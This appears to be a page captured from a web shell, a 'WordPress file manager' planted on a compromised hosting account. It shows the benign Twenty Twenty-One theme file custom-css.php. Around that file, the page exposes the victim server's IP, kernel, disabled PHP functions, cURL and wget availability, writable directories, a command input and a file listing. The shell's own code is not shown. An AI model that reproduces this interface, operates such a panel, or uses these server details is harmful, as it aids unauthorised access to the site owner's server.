GRAYBYTE WORDPRESS FILE MANAGER2986

Server IP : 149.255.58.128 / Your IP : 216.73.216.220
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/wheelch2/public_html/wp-content/themes/twentytwentyone/inc/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/wheelch2/public_html/wp-content/themes/twentytwentyone/inc//custom-css.php
<?php
/**
 * Custom CSS
 *
 * @package WordPress
 * @subpackage Twenty_Twenty_One
 * @since Twenty Twenty-One 1.0
 */

/**
 * Generate CSS.
 *
 * @since Twenty Twenty-One 1.0
 *
 * @param string $selector The CSS selector.
 * @param string $style    The CSS style.
 * @param string $value    The CSS value.
 * @param string $prefix   The CSS prefix.
 * @param string $suffix   The CSS suffix.
 * @param bool   $display  Print the styles.
 * @return string
 */
function twenty_twenty_one_generate_css( $selector, $style, $value, $prefix = '', $suffix = '', $display = true ) {

	// Bail early if there is no $selector elements or properties and $value.
	if ( ! $value || ! $selector ) {
		return '';
	}

	$css = sprintf( '%s { %s: %s; }', $selector, $style, $prefix . $value . $suffix );

	if ( $display ) {
		/*
		 * Note to reviewers: $css contains auto-generated CSS.
		 * It is included inside <style> tags and can only be interpreted as CSS on the browser.
		 * Using wp_strip_all_tags() here is sufficient escaping to avoid
		 * malicious attempts to close </style> and open a <script>.
		 */
		echo wp_strip_all_tags( $css ); // phpcs:ignore WordPress.Security.EscapeOutput
	}
	return $css;
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 29 2023 22:38:19
1032 / wheelch2
0755
back-compat.php
2.418 KB
May 29 2023 22:38:19
1032 / wheelch2
0644
block-patterns.php
20.041 KB
May 29 2023 22:38:19
1032 / wheelch2
0644
block-styles.php
2.384 KB
May 29 2023 22:38:19
1032 / wheelch2
0644
custom-css.php
1.171 KB
May 29 2023 22:38:19
1032 / wheelch2
0644
menu-functions.php
3.63 KB
May 29 2023 22:38:19
1032 / wheelch2
0644
starter-content.php
8.53 KB
May 29 2023 22:38:19
1032 / wheelch2
0644
template-functions.php
17.273 KB
May 29 2023 22:38:19
1032 / wheelch2
0644
template-tags.php
7.287 KB
May 29 2023 22:38:19
1032 / wheelch2
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF